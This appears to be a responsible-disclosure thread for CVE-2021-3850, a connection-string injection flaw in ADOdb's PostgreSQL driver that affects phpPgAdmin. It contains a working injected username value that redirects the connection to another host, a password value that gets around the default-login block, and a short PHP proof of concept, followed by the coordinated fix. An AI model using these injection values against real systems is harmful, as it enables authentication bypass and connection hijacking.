Authentication Bypass by Primary Weakness in adodb/adodb

Valid

Reported on

Oct 28th 2021


Description

An attacker can inject values into the PostgreSQL connection string by bypassing adodb_addslashes() . The function can be bypassed in phppgadmin for example by surrounding the username in quotes and submitting with other parameters injected in between.

Proof of Concept

I'm going to use phppgadmin as an example of a project that this effects.

When a user goes to login the username and password are passed to this function before reaching pg_connect()

function adodb_addslashes($s)
{
    $len = strlen($s);
    if ($len == 0) return "''";
    if (strncmp($s,"'",1) === 0 && substr($s,$len-1) == "'") return $s; // already quoted

    return "'".addslashes($s)."'";
}

An attacker can login with a username of: 'testinguser' host='1.3.3.7' and the phppgadmin will login but be connected to 1.3.3.7 .

Impact

In the context of phppgadmin getting past the login panel opens up a lot more possibilities for functions to exploit. It can also reveal the backend IP of a server. I was unable to find anything other than the host parameter to inject into the connection string that was interesting.

This bypass also allows an attacker to use default logins that would otherwise be blocked in phppgadmin (the password part here could by bypassed by using '' lol='' as a password)

$bad_usernames = array('pgsql', 'postgres', 'root', 'administrator');
$username = strtolower($server_info['username']);  
  
if ($server_info['password'] == '' || in_array($username, $bad_usernames)) {  
   unset($_SESSION['webdbLogin'][$_REQUEST['server']]);  
   $msg = $lang['strlogindisallowed'];  
   include('./login.php');  
   exit;  
}
We created a GitHub Issue asking the maintainers to create a SECURITY.md 7 months ago
Damien Regad
5 months ago

Maintainer


Many thanks for the report.

I can confirm the vulnerability, which goes all the way back to the oldest version of the PostgreSQL driver I have in the ADOdb repository (4.65 / 2005).

I'll now check how to properly address the issue.

With regards to your POC, for the record and as far as I can tell, phpPgAdmin are using a customized (and therefore unsupported), very old version of ADOdb so they will have to patch their code manually once I fix this.

<?php
include 'adodb.inc.php';
$db = ADONewConnection('pgsql');

$host_good = 'localhost';
$user_good = 'user';
$password = 'xxxx';
$database = 'dbname';

$user_evil = "'user' host='1.3.3.7'";

$db->connect($host_good, $user_good, $password, $database); // success
$db->connect($host_good, $user_evil, $password, $database); // !!!
Damien Regad validated this vulnerability 5 months ago
meme-lord has been awarded the disclosure bounty
The fix bounty is now up for grabs
meme-lord
5 months ago

Researcher


Ok, I'll send them a separate report once there's a fix although they have yet to respond to my other reports.

Damien Regad
5 months ago

Maintainer


Did you or are you planning to request a CVE-ID for this ? If so, let me know the number, otherwise I can take care of it.

How would you like to be credited for the finding ?

meme-lord
5 months ago

Researcher


I have not applied for a CVE for this. I would like to be credited as Emmet Leahy of Sorcery Ltd. I'll request on the CVE to add a link to a writeup on my blog or something after it's fixed.

Damien Regad
5 months ago

Maintainer


@admin Submitting a patch using my fork of the repository will effectively make it (and the vulnerability) available to the general public...

Is there some way to submit a patch in a more private manner ?

The alternative would be to just delay submitting the patch to you until hotfix releases are out, but I'd prefer to give the researcher a chance to test and confirm it effectively addresses the issue.

Jamie Slome
5 months ago

Admin


@dregad - thanks for your question! 👍

Once a fix has been confirmed against the report, it will be made public. This is done using the confirm fix button on the page.

I can see that you have already discussed this partially with Adam over Chatwoot, and so will go ahead and assign a CVE number for this report.

Once you are ready to publish this report and the CVE, let us know, so we can make both the CVE & report visible.

Jamie Slome
5 months ago

Admin


CVE-2021-3850 has now been assigned to this report! 🎊

Let me know if you have any further questions @dregad, and happy to support.

Damien Regad
4 months ago

Maintainer


I thought this would be a good opportunity to test Github's Security Advisories feature which, as I have just found out, allows to create a private repository to collaborate on the patch without disclosing it.

@meme-lord can you please confirm that you are using the same user ID on Github (and if not, give me your Github username) so I can grant you access to the temporary private repo ?

meme-lord
4 months ago

Researcher


My Github username is meme-lord, same as here

Damien Regad confirmed that a fix has been merged on 952de6 4 months ago
Damien Regad has been awarded the fix bounty
to join this conversation